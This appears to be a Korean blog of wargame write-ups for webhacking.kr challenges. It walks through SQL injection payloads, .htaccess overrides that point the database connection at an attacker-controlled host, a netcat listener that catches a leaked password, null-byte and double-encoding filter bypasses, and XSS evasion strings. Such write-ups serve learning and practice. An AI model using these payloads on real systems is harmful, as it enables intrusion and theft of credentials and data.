늘모자란, 개발

왠 테이블이 있고 각 row는 클릭할 수 있게 되있다. 테이블의 제일 끝에는 join이 위치해있다
뭘 눌러도 일단 no가 뜨고 join을 누르니 내 아이디가 떴다. 검색해보니 테이블안에 내 아이디가 위치해 있었다. hit는 0..
나를 한번 클릭하니 새로고침 되고 1이 올랐다. 내 아이디를 위로 올려야되는걸까?

쿠키를 보니 vote_check 라는값이 있다. 이걸로 투표를 했나 안했나 체크하는것 같은데..
당연한 말이지만 vote_check를 삭제하고 클릭하면 투표를 무한정 할 수 있다. 세션에서 체크를 하지 않고 클라이언트를 맹신하면 어떻게 되는지 보여주는 예라고 할 수 있다.
일일히 지우고 클릭하기 귀찮았으므로 python script를 대충 짜고 쿠키를 설정하지 않은채 쭉 보내준다.



너무 많이 보낸것 같다..

2016/04/01 15:30 2016/04/01 15:30

$port=rand(10000,10100);
$socket=fsockopen("$_GET[server]","$port",$errno,$errstr,3) or die("error : $errstr");
error : Connection timed out

nc -nvl -p 10000

Connection from [112.216.9.92] port 10000 [tcp/*] accepted (family 2, sport 42925)
GET /Password is ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ HTTP/1.0
Host: 

2016/04/01 15:18 2016/04/01 15:18

파일 업로드 취약점은 상식이 거의 없어서 밑천이 드러나고 있다... 계속 고전중인데, 이녀석도 그렇게 될 것 같은 기분이 든다

phps를 보면,

<?
mysql_connect() or die();

mysql_select_db("challenge_30_table") or die();

$q=mysql_query("select password from challenge_30_answer") or die();

$data=mysql_fetch_array($q) or die();

if($data)
{
$pw="????";
echo("Password is $pw");
}

?>

index.phps는 일단 아무 상관이 없다. 그리고 입력하는 데이터도 없고, 얘를 성공적으로만 돌아가게 하면 그냥 성공인것 같다.

http://webhacking.kr/challenge/web/web-15/upload/index.php

로 들어가면 흰화면이 뜬다. 아마 die가 된다는 말이겠지?
접근은 간단하게 .htaccess를 겹쳐썼듯이 해보기로 한다.
내용은 완전히 똑같게 하고 , index.php를 업로드 시도했더니 정말 쿨하게 no가 돌아왔다. 경로를 upload/ 를 붙여봐도 똑같다. index란게 안되나..

indx2.php로 이름을 바꾸고 올려보니까 올라갔는데, <xmp>가 붙은것 마냥 그대로 나왔다.
어쨌든, php를 원격으로 실행도 안되고 결국은 아까처럼 htaccess를 가지고 놀아야 할 느낌이었다. 역시 좀 생각을 해봤는데 내가 안본지 오래되서 놓쳤던게 있었다.

mysql_connect()는 여기에 원래 host를 적어줘야한다. 근데 여기선 host가 없다. 즉 기본값을 따라간다는것 같은..데...
mysql 홈페이지에가서 이런걸 확인해볼 수 있었다.

resource mysql_connect(string server= =ini_get("mysql.default_host"),
                       string username= =ini_get("mysql.default_user"),
                       string password= =ini_get("mysql.default_password"),
                       bool new_link= =false,
                       int client_flags= =0);

그렇다면 어떻게 해야하느냐~ 얘를 수정해보도록 하자.
htaccess에서 PHP value를 주기 위해서는 php_value라고 명시해줘야 한다. 다음과 같은 모양이 되야한다.(도메인이 아니라 IP를 쓰자)

php_value mysql.default_host "@@@@@@@@"

php_value mysql.default_user "############"

php_value mysql.default_password "~~~~~~~"

이렇게 만들어 주면 그냥 일사천리다.
내가 의도한 DB에 접속하도록 DB와 테이블을 만들어주면 문제가 해결된다.
값은 별 상관없다.

INSERT INTO `challenge_30_table`.`challenge_30_answer` (`password`) VALUES ('1')

2016/03/31 21:43 2016/03/31 21:43

아까와 흡사한 문제인것 같다.
. 이 들어가면 없애버리니까 abc.txt 는 abctxt 같은 형태로 저장되려나 보다.
pass.word나 .htaccess를 올려보니 선택된 파일이 존재한다고만 하고, 감이 안왔다.
이번 문제는 정말 너무 불친절해서 뭘 의미하는질 모르겠다..

파일을 그냥 이것저것 올려보니까 드디어 뭔가 단서를 얻은 것 같다.

글자가 안보여서 좀 키웠다. 여튼 요런게 나온다.
그리고 똑같은 파일을 올리면 또 안나온다. (안나오는게 정상은 아닌것 같다)
한번 더 올려봤다.



이제야 뭔가 감이 잡히는 느낌이다. 결국 filename으로 password를 select 해야되는 미션으로 보인다.
요컨데 예상하기로 쿼리는

INSERT INTO c29_tb (time,ip,file) VALUES (time(),$_SERVER['REMOTE_ADDR'], $file_name)

요런 모양일 것 같다. 고로..
") 로 파일명을 조작해서 보내본다.

------WebKitFormBoundary3EKwhzwJ8VfERMhS
Content-Disposition: form-data; name="upfile"; filename="'); select 1,2,password from c29_tb"
Content-Type: image/png

------WebKitFormBoundary3EKwhzwJ8VfERMhS--

아니나 다를까 에러가 돌아온다. (upload error!)

여기서 검색을 좀 했다. 나로서는 너무 답답해서 .. 원리는 알겠는데 순서를 짜맞추고 있는게 너무 답답해서 좀 참고했다.

나름의 정리를 하자면

Content-Disposition: form-data; name="upfile"; filename="abcd.txt', (select password from c29_tb), CHAR(..............))#"

첫번째 파라미터는 filename에 들어가야할 녀석이고, 두번째는 time, 그다음은 IP이다.
이때 IP는 무조건 내 아이피가 기입되야 볼 수 있는 구조이다. 즉, IP가 다르면 보여지지 않기때문에 CHAR함수를 이용해 아이피를 hex값으로 변환해 정상동작하도록 시킨다.
그리고 원래 시간이 나와야할 곳에 서브쿼리를 작성해 password를 출력하게 하면 된다.

몇십분동안 Done은 뜨는데 보이질 않아서 정말 빡쳤었는데 결국 아이피 문제였다... 다양한 방법으로 생각을 해봤으면 좋았을것을 아쉽다

2016/03/31 21:06 2016/03/31 21:06

나는 처음에 얘를 보고 웹쉘이라고 생각했다.
그래서 php파일을 올린다음에 웹쉘처럼 쓰면 되지 않을까? 생각했다. 우선 php코드가 작동되는지 봐야했기때문에, hi.php 를 작성해서 올려봤다.


아무래도 보안 어쩌고 하는거보니 웹쉘로 공격당했나보다 정말로..
어쨌든 이 문제가 요구하는건 .htaccess를 겹쳐써서, 해당 디렉토리가 더 이상 기능을 수행할 수 없도록 하는것이 목표라고 할 수 있겠다.

그래서 빈 htaccess를 올려보고 별걸 다해봤는데 잘 안되었다.
결국 검색찬스...를 썼는데, read me 라고 출력되는게 애초에 php 코드가 출력되는거라서 이를 무력화하면 된다고 한다.

htaccess의 문법은 좀 특이한 편인데 나는 여기서 PHP를 off하는걸 확인하고 옮겼다.

RemoveHandler .php .phtml .php3
RemoveType .php .phtml .php3
php_flag engine off

업로드 하는순간 문제는 클리어된다.
요점은, htaccess 간수를 잘해야된다정도랄까? REWRITE ENGINE등으로 넘겨주고 있는 곳도 많은데 (나를 포함해), htaccess가 겹쳐지게 되면 정말 재앙이 일어날 수 있다는걸 알려주는것 같다.

2016/03/31 18:36 2016/03/31 18:36

index.phps를 보라고 주석에 되있으니 보자....

<html>
<head>
<title>Challenge 27</title>
</head>
<body>
<h1>SQL INJECTION</h1>
<form method=get action=index.php>
<input type=text name=no><input type=submit>
</form>
<?
if($_GET[no])
{

if(eregi("#|union|from|challenge|select|\(|\t|/|limit|=|0x",$_GET[no])) exit("no hack");

$q=@mysql_fetch_array(mysql_query("select id from challenge27_table where id='guest' and no=($_GET[no])")) or die("query error");

if($q[id]=="guest") echo("guest");
if($q[id]=="admin") @solve();

}

?>
<!-- index.phps -->
</body>
</html>

no라는 값을 GET으로 넘겨야되는데 골때리는게
정말 select를 위해 필요한녀석들을 다 필터링해놨다. 그렇지만 admin으로 패스해야하니 짱구를 굴려보자
사실 이 문제는 이 문제와 굉장히 닮았다. 그래서 귀찮은마음에 답을 복사해서 넣어봤더니... ㅎㅎ 당연히 안된다.

원리는 똑같다. 앞선 데이터를 무효화하고 admin으로 로그인하면된다.
우선 admin의 row를 알아야내야하는데, 0은 반응없고 1일때는 true, 2일때는 query error가 난다. 2가 admin인가보다.
no=의 값이 괄호 처리 되어 있기때문에 괄호부터 깨준다.

-1) 를 넣어주고(1만 아니면 뭐든 상관없다)
그다음에 우리가 원하는 2를 넣어준다. 근데 no=2를 하고 싶지만 =가 필터링되고 있다.
그래서 잘 써먹던 in을 적어줘봤다. -1) or no in(2) 그치만 내가 못읽은... '(' 가 필터링 되고 있다
그래서 like를 써보기로 하고, 주석처리를 해준다.

mysql은 #과 -- 를 주석으로 쓸 수 있다.
고로 대강 쿼리를 만들어보면

0) or no like 2 -- 

요런 모양이 된다.

2016/03/31 16:02 2016/03/31 16:02

이제 문제 생김새에 입대기도 지친다.

<html> 
<head> 
<title>Challenge 26</title> 
<style type="text/css"> 
body { background:black; color:white; font-size:10pt; }     
a { color:lightgreen; } 
</style> 
</head> 
<body> 

<? 

if(eregi("admin",$_GET[id])) { echo("<p>no!"); exit(); } 

$_GET[id]=urldecode($_GET[id]); 

if($_GET[id]=="admin") 
{ 
@solve(26,100); 
} 

?> 


<br><br> 
<a href=index.phps>index.phps</a> 
</body> 
</html> 

정규식 필터링인데, get ID중에 admin을 필터링하고 있다. 근데 solve하려면 admin을 넣어야된다고 한다.
사실 이건 문제같지도 않은게, eregi 밑에 urldecode를 하고 있다. 뭐하라는건진 잘 모르겠는데 urlencode해주면된다.
근데 바로 안된다. 좀 고민을 하다가 두번 인코드하면 어떨까 해서 했더니 된다.

사실 double encode는 알고 있었는데 바로바로 생각이 안나는거보니 멀었다...
이 기법은 유명한 기법인데, OWASP의 XSS Filter Evasion 문서를 참고 하면 도움이 될 것 같다.

2016/03/31 15:41 2016/03/31 15:41

이 문제는 불러오는 녀석의 취약점인데 많은 사이트들이 취하고 있는 다운로드 방법이라 할 수 있다.
일단 요 문제는 생긴게 아니라 URL을 봐야한다.

http://webhacking.kr/challenge/bonus/bonus-5/?file=hello

파일이 어디 저장되어있는지 감추고 싶을때, 요컨데 이런식으로 사용하는 것이다

(절대경로) (입력받은 파일의 이름) (절대확장자(fixed))
고로 이 경우엔 무조건 hello.txt라는 파일을 읽도록 디자인 되어 있음이 틀림없다. 고로 .txt 부분부터 무력화 하면 될것이다
보통은 이런 경우 공격을 위해 null을 사용한다.

이름.php\0.txt 꼴이 되게 하는건데 이런경우 txt까지 읽지 않고 앞의 확장자까지만 읽게 된다.
고로 요렇게 만들어줘서 리퀘스트를 해준다. null은 urlencode hardware 에서 검색해서 넣으면된다.

그럼 비밀번호가 나온다. Auth 해주고 점수를 챙기자. 절대 경로로 사용하는 요 방법은 상위 directory traversal 과 같은 공격으로 이어지기도 하니까, 필터링을 잘해야한다. 애초에 쓸데없는 null이나, ../ 이런건 필터링 해버려야한다

2016/03/31 15:29 2016/03/31 15:29

<?

extract($_SERVER);
extract($_COOKIE);

if(!$REMOTE_ADDR) $REMOTE_ADDR=$_SERVER[REMOTE_ADDR];

$ip=$REMOTE_ADDR;
$agent=$HTTP_USER_AGENT;


if($_COOKIE[REMOTE_ADDR])
{
$ip=str_replace("12","",$ip);
$ip=str_replace("7.","",$ip);
$ip=str_replace("0.","",$ip);
}

echo("<table border=1><tr><td>client ip</td><td>$ip</td></tr><tr><td>agent</td><td>$agent</td></tr></table>");

if($ip=="127.0.0.1")
{
@solve();
}

else
{
echo("<p><hr><center>Wrong IP!</center><hr>");
}
?>

2016/03/31 15:17 2016/03/31 15:17

JS challenge인것 같다.
스크립트를 끼워넣는건 XSS의 기본이므로 고심해보기로 하자
당연한 말이지만 그대로 넣으면 안된다. no hack이 우리를 반겨준다.

문제는 뭘 의미하는지 뻔하다. 브라우저의 똑똑함을 이용하는 것이다. 브라우저라는 놈은 원체 똑똑하면서 멍청해서, <scrip+t> 이런것도 그냥 script로 인식해서 돌려준다. 따라서 필터링 되있다면 그사이에 쓸데없는 단어를 끼워넣어 패스해볼것이다. 요컨데 이런 모양이다

<s c r i p t > alert(1);</ s c r i p t >

혹시 하는 마음에 <scri+pt> 로 해도 안된다. 뭐가 막혔을까? 전부 개행시켜줘봐도 안된다. 이정도 되면 공백이 필터링 됐다고 봐야한다.
그치만 우리는 urlencode hardware 로 뭔가 뛰어넘어본 사람들이다. 안쓰던걸 막 넣어서 돌려보자

<%00s%00c%00r%00i%00p%00t%00>alert(1);</%00s%00c%00r%00i%00p%00t%00>

대략 이런 느낌으로 만들어준다. alert도 땡기면 막 넣어준다.
뭐가 됐는진 모르겠는데 이미 패스했단다. 허무하다... 디버거툴을 쓰면 이런일이 발생한다....... 하여튼 패스.....

2016/03/31 15:01 2016/03/31 15:01